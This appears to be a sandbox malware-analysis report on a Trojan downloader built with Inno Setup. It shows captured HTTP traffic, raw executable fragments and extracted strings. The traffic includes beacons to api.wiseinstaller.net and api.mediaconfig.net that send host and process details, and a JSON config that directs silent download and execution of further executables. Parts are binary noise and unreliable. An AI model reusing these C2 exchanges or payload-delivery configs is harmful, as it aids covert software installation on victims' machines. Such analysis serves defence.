
Content-Length: 1454080

Server: AmazonS3
MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$.......5W..q6eCq6eC
q6eC...C}6eC...C.6eC...Ci6eC...Cp6eC.kfBb6eC.k`BY6eC.kaBc6eC...Cp6eC..
.Cp6eC...Cp6eC...Ch6eCq6dC.6eC.k`Bh6eC.k.Cp6eCq6.Cp6eC.kgBp6eCRichq6eC
........PE..L...v..W.................n..........M.............@.......
..........................\[email protected]...
.....P..<..........................................................
.....@............................................text....m.......n...
............... ..`.rdata..@~...........r..............@[email protected]...(&g
t;[email protected].......@......................@.
[email protected]...<....P......................@[email protected]...................
[email protected].......................................................
......................................................................
......................................................................
.....................................................U...M.VW.}...u..O
 .E..G0.E..G4.G.PWh#[email protected].~;.........t.~.............O....PQj.W........
_..^].U...u..E..u..u..p..p..u;.......~.........].U..V.u..v..v...;...f.
..f..YY^].U...E.3.V...K...t......J...B..u. ..M..B..a...a...1.A.^].U...
E.VW3....K.....t......J.f.....f;.u. ....M...U.....y..y._.1.A.^].U...E(
..tj.M..U.S.].W.} ...t*...u(..t....A..........M..H..M..H..X..x.... ..M
.V.p0..t..p4.u$WSQ.u...R.u..u...#....^_[].$.U...E..E.t-.U..J..B.#M.#E.
..t..B..J.#E.#M.;B.u.;J.t.2.]...].U......S.K..U...V.u.....K.......
<<< skipped >>>

GET / HTTP/1.1

User-Agent: Proxy /1.0

Host: httpbin.org

HTTP/1.1 200 OK

Server: nginx

Date: Tue, 19 Apr 2016 23:26:01 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 12150

Connection: keep-alive

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true
<!DOCTYPE html>.<html>.<head>.  <meta http-equiv=
'content-type' value='text/html;charset=utf8'>.  <meta name='gen
erator' value='Ronn/v0.7.3 (hXXp://github.com/rtomayko/ronn/tree/0.7.3
)'>.  <title>httpbin(1): HTTP Client Testing Service</titl
e>.  <style type='text/css' media='all'>.  /* style: man */. 
 body#manpage {margin:0}.  .mp {max-width:100ex;padding:0 9ex 1ex 4ex}
.  .mp p,.mp pre,.mp ul,.mp ol,.mp dl {margin:0 0 20px 0}.  .mp h2 {ma
rgin:10px 0 0 0}.  .mp > p,.mp > pre,.mp > ul,.mp > ol,.mp
 > dl {margin-left:8ex}.  .mp h3 {margin:0 0 0 4ex}.  .mp dt {margi
n:0;clear:left}.  .mp dt.flush {float:left;width:8ex}.  .mp dd {margin
:0 0 0 9ex}.  .mp h1,.mp h2,.mp h3,.mp h4 {clear:left}.  .mp pre {marg
in-bottom:20px}.  .mp pre h2,.mp pre h3 {margin-top:22px}.  .mp h2 pre
,.mp h3 pre {margin-top:5px}.  .mp img {display:block;margin:auto}.  .
mp h1.man-title {display:none}.  .mp,.mp code,.mp pre,.mp tt,.mp kbd,.
mp samp,.mp h3,.mp h4 {font-family:monospace;font-size:14px;line-heigh
t:1.42857142857143}.  .mp h2 {font-size:16px;line-height:1.25}.  .mp h
1 {font-size:20px;line-height:2}.  .mp {text-align:justify;background:
#fff}.  .mp,.mp code,.mp pre,.mp pre code,.mp tt,.mp kbd,.mp samp {col
or:#131211}.  .mp h1,.mp h2,.mp h3,.mp h4 {color:#030201}.  .mp u {tex
t-decoration:underline}.  .mp code,.mp strong,.mp b {font-weight:bold;
color:#131211}.  .mp em,.mp var {font-style:italic;color:#232221;text-
decoration:none}.  .mp a,.mp a:link,.mp a:hover,.mp a code,.mp a p
<<< skipped >>>

POST /api/get-configs HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: api.wiseinstaller.net

Content-Length: 588

Connection: Keep-Alive

user_agent=IE&uuid=d1293b98-9202-f886-ae67-8c6a0d1c8aa0&user_os=XP 32&proc=System,smss.exe,csrss.exe,winlogon.exe,services.exe,lsass.exe,vmacthlp.exe,svchost.exe,svchost.exe,svchost.exe,svchost.exe,svchost.exe,spoolsv.exe,jqs.exe,vmtoolsd.exe,alg.exe,explorer.exe,vmtoolsd.exe,imapi.exe,disablejavawarnsec.exe,sandbox_svc.exe,cmd.exe,tshark.exe,cmd.exe,Procmon.exe,%original file name%.exe,wmiprvse.exe,dc452e3893e90bc26b0ec26ad95c293a.tmp&main=1&v=22.99&nuuid=51f19233d47516b75c16bc02e96db8bf&user_hash=92d6f8bb2b84ac09257fcb1651070fe46ebfa391&trsrc=1 &aff=trs1&enc=supermega
HTTP/1.1 200 OK

Date: Tue, 19 Apr 2016 23:25:25 GMT

Content-Type: application/json

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d0ccf7e0149e2c23291c492c160e9c4551461108325; expires=Wed, 19-Apr-17 23:25:25 GMT; path=/; domain=.wiseinstaller.net; HttpOnly

X-Powered-By: PHP/5.4.36-0 deb7u3

Cache-Control: no-cache

X-Frame-Options: SAMEORIGIN

Set-Cookie: laravel_session=eyJpdiI6InlGa1RvTFk0S29YTnlCQk9ZalhwR2d5Y0FKYVNaNDRDajdNRnRLWDhCNnM9IiwidmFsdWUiOiJwWUtqV2MreE1KK0RpVzJNeFgxeWRnRE9EWnNVUnEzeGZxMXVvUzdKamwyaUxmYStxYlN2OHV3T1E2QnNOSVpvakFYT0g4UVE3eWExZDdneGRnaWR3Zz09IiwibWFjIjoiZDk3NzBjNDkwMTU2N2YzYTVhMDkzM2MxOWRiMzc3NjkyMjBlM2ZmMjY1ZTEzODdkNDZiNWM3MTRhYmI1YWQ0ZiJ9; expires=Wed, 20-Apr-2016 01:25:25 GMT; path=/; httponly

Server: cloudflare-nginx

CF-RAY: 29641d99c06a2ad3-WAW
459..{"updater":{"install_updater":true,"updater_url":"https:\/\/s3-us
-west-2.amazonaws.com\/16opz\/160419\/gpup_218.exe","updater_cmd":"\/s
etup \/channel=split24anon4","md5":"8cdf61ee1ff3923fa87d3becab247193"}
,"offers":[{"layout":1,"title":"","description":"getprivate alternativ
e","longtext":"","licencetext":"","firstlink":{"label":"","url":""},"s
econdlink":{"label":"","url":""},"continueLabel":"","binary":{"url":"h
ttps:\/\/swupdate.openvpn.org\/community\/releases\/openvpn-install-2.
3.9-I601-i686.exe","cmd":"\/S \/SELECT_TAP=0","md5":"727cf10ba7bc5a5b9
9b46ca8f3733005"},"offer_id":"268","preregistry":[""],"postregistry":[
""],"services":[""],"tasks":[""],"files":[""],"fi":"0"},{"layout":1,"t
itle":"","description":"","longtext":"","licencetext":"","firstlink":{
"label":"","url":""},"secondlink":{"label":"","url":""},"continueLabel
":"","binary":{"url":"https:\/\/s3-us-west-2.amazonaws.com\/16opz\/160
419\/hp_l_1739.exe","cmd":"\/setup channel=split24anon4","md5":"2b8834
dcf847d4b17855ffdd8251f711"},"offer_id":"221","preregistry":[""],"post
registry":[""],"services":[""],"tasks":[""],"files":[""],"fi":"0"}]}..
0......
<<< skipped >>>

POST /api/install-status HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: api.wiseinstaller.net

Content-Length: 186

Connection: Keep-Alive

status=IS&uuid=d1293b98-9202-f886-ae67-8c6a0d1c8aa0&user_os=XP 32&user_hash=92d6f8bb2b84ac09257fcb1651070fe46ebfa391&v=22.99&nuuid=51f19233d47516b75c16bc02e96db8bf&user_agent=IE&trsrc=1 
HTTP/1.1 200 OK

Date: Tue, 19 Apr 2016 23:25:26 GMT

Content-Type: application/json

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d0ccf7e0149e2c23291c492c160e9c4551461108325; expires=Wed, 19-Apr-17 23:25:25 GMT; path=/; domain=.wiseinstaller.net; HttpOnly

X-Powered-By: PHP/5.4.36-0 deb7u3

Cache-Control: no-cache

X-Frame-Options: SAMEORIGIN

Set-Cookie: laravel_session=eyJpdiI6IkRFOU5QNDQ2YnJKcTZuY3doK28yVlJ4SEZhUTBjN3VSWTE1K1F0aWFYXC80PSIsInZhbHVlIjoiTk9sb0RmcGxxSWdPS01GRWN1QWR5UFY1ZFNzRDNVcEZvR1k3ZUdtNytMeTdkSHc0RWdsUldIVzd3cjg3a3B5UXhMbFwvNTU0ZGJqamtNOGVWeEJnVVhnPT0iLCJtYWMiOiIzZDU5ZDVhMGMxZTdlMTM5ZjI5ZjU3ZDYxYmJmMzI5MzEwMzViNjU0NGM3MzQ1Zjc1NDg3NDUwNzRiYmFhODc4In0=; expires=Wed, 20-Apr-2016 01:25:26 GMT; path=/; httponly

Server: cloudflare-nginx

CF-RAY: 29641d9d50df2ad3-WAW
4.."OK"..0..HTTP/1.1 200 OK..Date: Tue, 19 Apr 2016 23:25:26 GMT..Cont
ent-Type: application/json..Transfer-Encoding: chunked..Connection: ke
ep-alive..Set-Cookie: __cfduid=d0ccf7e0149e2c23291c492c160e9c455146110
8325; expires=Wed, 19-Apr-17 23:25:25 GMT; path=/; domain=.wiseinstall
er.net; HttpOnly..X-Powered-By: PHP/5.4.36-0 deb7u3..Cache-Control: no
-cache..X-Frame-Options: SAMEORIGIN..Set-Cookie: laravel_session=eyJpd
iI6IkRFOU5QNDQ2YnJKcTZuY3doK28yVlJ4SEZhUTBjN3VSWTE1K1F0aWFYXC80PSIsInZ
hbHVlIjoiTk9sb0RmcGxxSWdPS01GRWN1QWR5UFY1ZFNzRDNVcEZvR1k3ZUdtNytMeTdkS
Hc0RWdsUldIVzd3cjg3a3B5UXhMbFwvNTU0ZGJqamtNOGVWeEJnVVhnPT0iLCJtYWMiOiI
zZDU5ZDVhMGMxZTdlMTM5ZjI5ZjU3ZDYxYmJmMzI5MzEwMzViNjU0NGM3MzQ1Zjc1NDg3N
DUwNzRiYmFhODc4In0=; expires=Wed, 20-Apr-2016 01:25:26 GMT; path=/; 
httponly..Server: cloudflare-nginx..CF-RAY: 29641d9d50df2ad3-WAW..4.."
OK"..0......
<<< skipped >>>

POST /api/offer-status HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: api.wiseinstaller.net

Content-Length: 206

Connection: Keep-Alive

offer_id=268&offer_status=1&uuid=d1293b98-9202-f886-ae67-8c6a0d1c8aa0&screen_number=0&v=22.99&nuuid=51f19233d47516b75c16bc02e96db8bf&user_hash=92d6f8bb2b84ac09257fcb1651070fe46ebfa391&trsrc=1 &user_os=XP 32
HTTP/1.1 200 OK

Date: Tue, 19 Apr 2016 23:25:54 GMT

Content-Type: application/json

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d882bb84d772279ae5f68dd87e744958e1461108353; expires=Wed, 19-Apr-17 23:25:53 GMT; path=/; domain=.wiseinstaller.net; HttpOnly

X-Powered-By: PHP/5.4.36-0 deb7u3

Cache-Control: no-cache

X-Frame-Options: SAMEORIGIN

Set-Cookie: laravel_session=eyJpdiI6IjdqcWp4dWpRbUhGQ1RSMWNJbXg1VFpmVHc0ZUtiMHY2QTZkXC9JTGZcL0pOUT0iLCJ2YWx1ZSI6IlNCS3hqREtJdUlrQTFSQ1lDVGJiQXVWdGdyc2hKaThWdW9UemEyN2tOdUc2OFdHTVNQSnR1V0VEZHRWbHFQdTN0RVpmOXFUaFNPdHRYWDE5Z2RMZ1JBPT0iLCJtYWMiOiI2NDlhOTBjMjY5NWJhNGM5OGM0NTk2ZDdjNjU1NDA0MTRjMWQ1NWU5NGJhMDViZjhmZWRhMjVhYzM4MjMzYjMxIn0=; expires=Wed, 20-Apr-2016 01:25:54 GMT; path=/; httponly

Server: cloudflare-nginx

CF-RAY: 29641e4b984b2ad3-WAW
4.."OK"..0..HTTP/1.1 200 OK..Date: Tue, 19 Apr 2016 23:25:54 GMT..Cont
ent-Type: application/json..Transfer-Encoding: chunked..Connection: ke
ep-alive..Set-Cookie: __cfduid=d882bb84d772279ae5f68dd87e744958e146110
8353; expires=Wed, 19-Apr-17 23:25:53 GMT; path=/; domain=.wiseinstall
er.net; HttpOnly..X-Powered-By: PHP/5.4.36-0 deb7u3..Cache-Control: no
-cache..X-Frame-Options: SAMEORIGIN..Set-Cookie: laravel_session=eyJpd
iI6IjdqcWp4dWpRbUhGQ1RSMWNJbXg1VFpmVHc0ZUtiMHY2QTZkXC9JTGZcL0pOUT0iLCJ
2YWx1ZSI6IlNCS3hqREtJdUlrQTFSQ1lDVGJiQXVWdGdyc2hKaThWdW9UemEyN2tOdUc2O
FdHTVNQSnR1V0VEZHRWbHFQdTN0RVpmOXFUaFNPdHRYWDE5Z2RMZ1JBPT0iLCJtYWMiOiI
2NDlhOTBjMjY5NWJhNGM5OGM0NTk2ZDdjNjU1NDA0MTRjMWQ1NWU5NGJhMDViZjhmZWRhM
jVhYzM4MjMzYjMxIn0=; expires=Wed, 20-Apr-2016 01:25:54 GMT; path=/; 
httponly..Server: cloudflare-nginx..CF-RAY: 29641e4b984b2ad3-WAW..4.."
OK"..0......
<<< skipped >>>

POST /api/offer-status HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: api.wiseinstaller.net

Content-Length: 206

Connection: Keep-Alive

offer_id=221&offer_status=1&uuid=d1293b98-9202-f886-ae67-8c6a0d1c8aa0&screen_number=0&v=22.99&nuuid=51f19233d47516b75c16bc02e96db8bf&user_hash=92d6f8bb2b84ac09257fcb1651070fe46ebfa391&trsrc=1 &user_os=XP 32
HTTP/1.1 200 OK

Date: Tue, 19 Apr 2016 23:26:24 GMT

Content-Type: application/json

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d72584eb66c618115599592204cb89b2c1461108383; expires=Wed, 19-Apr-17 23:26:23 GMT; path=/; domain=.wiseinstaller.net; HttpOnly

X-Powered-By: PHP/5.4.36-0 deb7u3

Cache-Control: no-cache

X-Frame-Options: SAMEORIGIN

Set-Cookie: laravel_session=eyJpdiI6IlhWUXNDQzQybXhXSXY2aVF2aWd2ZzY1N0t3V2puYVwvRmI0bzV3MkVrNzZJPSIsInZhbHVlIjoiTFZqa3ExNVBpR2FBTDgxQlBOYUFjTWhmUDBTZnNDVm5wRnVMRW54dVU3ZDJGNGc3RG42blhvbU4xQXV3SnptUEluWU1RejFIbzNTeTM3Nmd1YUtTT3c9PSIsIm1hYyI6IjQ2Y2ViYzQzZmM1ZWE4ZjkyMTQ1OTk5OGMyZDgwNDhjMGQwOGExZjAwZGU2YmY5MDUxODgxMzIwZmE3NzM1MGUi

POST /index.php/api/updater-status HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: api.mediaconfig.net

Content-Length: 136

Connection: Keep-Alive

uuid=d1293b98-9202-f886-ae67-8c6a0d1c8aa0&nuuid=51f19233d47516b75c16bc02e96db8bf&status=0&version=218&channel=split24anon4&task=schedule
HTTP/1.1 200 OK

Date: Tue, 19 Apr 2016 23:25:32 GMT

Content-Type: application/json

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=de7eabbfa53d6ab20510310d4e815da8f1461108332; expires=Wed, 19-Apr-17 23:25:32 GMT; path=/; domain=.mediaconfig.net; HttpOnly

X-Powered-By: PHP/5.4.36-0 deb7u3

Cache-Control: no-cache

X-Frame-Options: SAMEORIGIN

Set-Cookie: laravel_session=eyJpdiI6IkVzdEgwbzdhejE1c2d6T0xmUUxPVW9OTXFxK0JGM1NTUGVOZkp0aTh6ekE9IiwidmFsdWUiOiJVN3d3VTNvem9nRjFRZmdBa3Fqa0dyRlwvXC9MRmJJd1czU0xLQUhkZ21mNHhLOU95b25ybG9DQUlnVFh1bUpZOVwvTEU1aTBwcnpWV2JxNEZYZ1hWOFNtZz09IiwibWFjIjoiMDI0NWIwYjIyODViNjM0NDc3NTA4YjgwMGZjNGY0OGQ1YTNiZDA2M2Y0NDQwZTBjMmE2YjY3ZGM3OTZkNzA1OSJ9; expires=Wed, 20-Apr-2016 01:25:32 GMT; path=/; httponly

Server: cloudflare-nginx

CF-RAY: 29641dc649dd2aeb-WAW
4.."OK"..0..HTTP/1.1 200 OK..Date: Tue, 19 Apr 2016 23:25:32 GMT..Cont
ent-Type: application/json..Transfer-Encoding: chunked..Connection: ke
ep-alive..Set-Cookie: __cfduid=de7eabbfa53d6ab20510310d4e815da8f146110
8332; expires=Wed, 19-Apr-17 23:25:32 GMT; path=/; domain=.mediaconfig
.net; HttpOnly..X-Powered-By: PHP/5.4.36-0 deb7u3..Cache-Control: no-c
ache..X-Frame-Options: SAMEORIGIN..Set-Cookie: laravel_session=eyJpdiI
6IkVzdEgwbzdhejE1c2d6T0xmUUxPVW9OTXFxK0JGM1NTUGVOZkp0aTh6ekE9IiwidmFsd
WUiOiJVN3d3VTNvem9nRjFRZmdBa3Fqa0dyRlwvXC9MRmJJd1czU0xLQUhkZ21mNHhLOU9
5b25ybG9DQUlnVFh1bUpZOVwvTEU1aTBwcnpWV2JxNEZYZ1hWOFNtZz09IiwibWFjIjoiM
DI0NWIwYjIyODViNjM0NDc3NTA4YjgwMGZjNGY0OGQ1YTNiZDA2M2Y0NDQwZTBjMmE2YjY
3ZGM3OTZkNzA1OSJ9; expires=Wed, 20-Apr-2016 01:25:32 GMT; path=/; http
only..Server: cloudflare-nginx..CF-RAY: 29641dc649dd2aeb-WAW..4.."OK".
.0......
<<< skipped >>>

POST /index.php/api/updater-status HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: api.mediaconfig.net

Content-Length: 136

Connection: Keep-Alive

uuid=d1293b98-9202-f886-ae67-8c6a0d1c8aa0&nuuid=51f19233d47516b75c16bc02e96db8bf&status=1&version=218&channel=split24anon4&task=schedule
HTTP/1.1 200 OK

Date: Tue, 19 Apr 2016 23:25:34 GMT

Content-Type: application/json

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d60ef2e116b27708396a1d9e9eb8ef22f1461108333; expires=Wed, 19-Apr-17 23:25:33 GMT; path=/; domain=.mediaconfig.net; HttpOnly

X-Powered-By: PHP/5.4.45-0 deb7u2

Cache-Control: no-cache

X-Frame-Options: SAMEORIGIN

Set-Cookie: laravel_session=eyJpdiI6ImZvTFZoWnBXcm1WSXBPa3h6dDhjUVNvb3N6aW55eUtNZUpETnV0dElrbUE9IiwidmFsdWUiOiJHNG5laG5iQ1d4UFVSVWxYZW9QYTNGQXlXUDMyMUpFMTVCY1RYSVZPTjNKa2Y1MHQ4bzdDY2hcL2FHK2owaEVJMUFtOTJROGRTbUdDcnBqbWxnc1g1ZWc9PSIsIm1hYyI6IjRkYTZkNzEwZmY5ZWEzMmVkZDRlZGI4NDlhYTY2ZTZlMTMxYjBhNGY2NTU4NjQ2ZGQ1MzQ4NTJjZjJmYjIwNGQifQ==; expires=Wed, 20-Apr-2016 01:25:34 GMT; path=/; httponly

Server: cloudflare-nginx

CF-RAY: 29641dcdba952aeb-WAW
4.."OK"..0..

GET /community/releases/openvpn-install-2.3.9-I601-i686.exe HTTP/1.1

Host: swupdate.openvpn.org

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 19 Apr 2016 23:25:35 GMT

Content-Type: application/octet-stream

Content-Length: 1720104

Connection: keep-alive

Set-Cookie: __cfduid=dcd6f0a5c40b2e489e3c5e5e47fe6420b1461108335; expires=Wed, 19-Apr-17 23:25:35 GMT; path=/; domain=.openvpn.org; HttpOnly

Last-Modified: Wed, 16 Dec 2015 13:19:43 GMT

ETag: "567164ef-1a3f28"

CF-Cache-Status: HIT

Expires: Wed, 20 Apr 2016 23:25:35 GMT

Cache-Control: public, max-age=86400

Accept-Ranges: bytes

Server: cloudflare-nginx

CF-RAY: 29641dd5d20b02d9-AMS
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L....~*T
.....................l.......A............@..........................p
................ ..........................................m..........
....8#................................................................
...........................text... ........................... .0`.dat
[email protected]..<#.......$.............
[email protected]@.bss..................................0..idata...............
[email protected]... ....... [email protected].
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F.........;D..H...H.......M..E..58;D..D$...$....D..M..E.....SS...E..
.$.D$... .D..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|.D..E..R...D$..E..D$...$....D.....<$....D..E..Q.}.;}...Q...
.~X........F4..$....D...W..........$.E......E......D$.........D.RR.FX.
.$.D$.....D..5..D.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$..
;D.....D...|.......T$...$..QQ.<$....D.S.M..E..D$...$....D.PP1..
<<< skipped >>>

GET /151125/helloworld.exe HTTP/1.1

Host: s3-us-west-2.amazonaws.com

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: bi9ZF3qqVyDOlhb8NfC07AeQDdznsRgSjCxk5qB9mR4zfM3WqpnMYIi3A7bMpYyCEkcMSlEnhXI=

x-amz-request-id: 25735F7E2BF2BA98

Date: Tue, 19 Apr 2016 23:25:35 GMT

Last-Modified: Mon, 07 Mar 2016 11:26:12 GMT

ETag: "dc77ba37fe8e792e5c6f267e78d768fc"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Content-Length: 31744

Server: AmazonS3
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........>...P..
.P...P.......P...Q...P.......P.......P.......P.......P.Rich..P........
.................PE..L...*b.V.................D...B...............`...
.@.......................................@............................
......y..(............................................................
........w..@............`...............................text....C.....
..D.................. ..`.rdata.......`... ...H..............@[email protected]
[email protected].............
[email protected].................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..3.].....U...=([email protected].
......u......h.........YY].jXh`[email protected]...`@[email protected]...`@.
[email protected].<.@[email protected][email protected][email protected]...@.
....M........u.j..S...Y.1.....u.j..B...Y......u........y.j......Y...`@
....@....... [email protected];.t.P.....Y.
[email protected]."....I......E......M.PQ.....
YY..e..E..E..}..u.P......(....E......E..7................U...E....8csm
.u*.x..u$.@.= ...t.=!...t.="[email protected].]...h..@....`@.3...
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.itext

`.data

.idata

.rdata

@.rsrc

ENoMonitorSupportException

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

Inno Setup Setup Data (5.5.6) (u)

Inno Setup Messages (5.5.3) (u)

oleaut32.dll

advapi32.dll

RegOpenKeyExW

RegCloseKey

user32.dll

GetKeyboardType

kernel32.dll

MsgWaitForMultipleObjects

ExitWindowsEx

GetWindowsDirectoryW

GetCPInfo

comctl32.dll

KWindows

6MsgIDs

Msgs

name="JR.Inno.Setup"

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

.DEFAULT\Control Panel\International

File I/O error %d

lzmadecompsmall: Compressed data is corrupted (%d)

lzmadecompsmall: %s

LzmaDecode failed (%d)

/SUPPRESSMSGBOXES

/PASSWORD=password

Specifies the password to use.

For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline

shell32.dll

/SL5="$%x,%d,%d,

Invalid file name - %s

Invalid variant operation

External exception %x

Interface not supported

Object lock not owned(Monitor support function not initialized

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

I/O error %d

Integer overflow Invalid floating point operation

Invalid pointer operation

2.0.0.2

2.0.0.2

dc452e3893e90bc26b0ec26ad95c293a.tmp_488:

.text

`.itext

`.data

.idata

.rdata

@.rsrc

Windows

ENoMonitorSupportException

.uvCOu

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

EVariantBadIndexError

ssShift

htKeyword

EInvalidOperation

Uh.AB

UhÛ

EInvalidGraphicOperation

PasswordChar

OnKeyDown

OnKeyPressTOE

OnKeyUp

ssHorizontal

OnKeyUpX

TCustomButton.TButtonStyle

AutoHotkeys

TKeyEvent

TKeyPressEvent

HelpKeywordl

ssHotTrack

TWindowState

poProportional

TWMKey

KeyPreview

WindowState

EXPORT

TPSExec

TPSRuntimeClassImporterP{P

TPSExportedVar

TPSCustomDebugExec

TPSDebugExec

Uh.JJ

t.Htb

1.2.1

TPasswordEdit

PasswordEdit(

Password

PasswordPage

PasswordLabel

PasswordEdit

PasswordEditLabel

CheckPassword

<requestedExecutionLevel level="

IMsg

FormKeyDown

PasswordCheckHash

TKeyNameConst

TOutputMsgWizardPage

TOutputMsgMemoWizardPage

MsgLabel

Msg1Label

Msg2Label

function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;

function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;

function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;

function GetIniString(const Section, Key, Default, Filename: String): String;

function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;

function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;

function IniKeyExists(const Section, Key, Filename: String): Boolean;

function SetIniString(const Section, Key, Value, Filename: String): Boolean;

function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;

function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;

procedure DeleteIniEntry(const Section, Key, Filename: String);

function GetCmdTail: String;

function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;

function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;

function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;

function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;

function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;

function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;

function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;

function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;

function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;

function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;

function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;

function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;

function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;

function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;

function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;

function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;

function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;

function CheckForMutexes(Mutexes: String): Boolean;

function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;

function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;

function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;

function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;

function MakePendingFileRenameOperationsChecksum: String;

function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;

function ExitSetupMsgBox: Boolean;

function GetWindowsVersion: Cardinal;

procedure GetWindowsVersionEx(var Version: TWindowsVersion);

function GetWindowsVersionString: String;

function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;

function CustomMessage(const MsgName: String): String;

function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;

function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;

function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;

function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;

function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;

function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;

procedure RaiseException(const Msg: String);

function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;

CREATEOUTPUTMSGPAGE

CREATEOUTPUTMSGMEMOPAGE

MSGBOX

INIKEYEXISTS

GETCMDTAIL

REGKEYEXISTS

REGDELETEKEYINCLUDINGSUBKEYS

REGDELETEKEYIFEMPTY

REGGETSUBKEYNAMES

CHECKFORMUTEXES

SHELLEXEC

SHELLEXECASORIGINALUSER

MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM

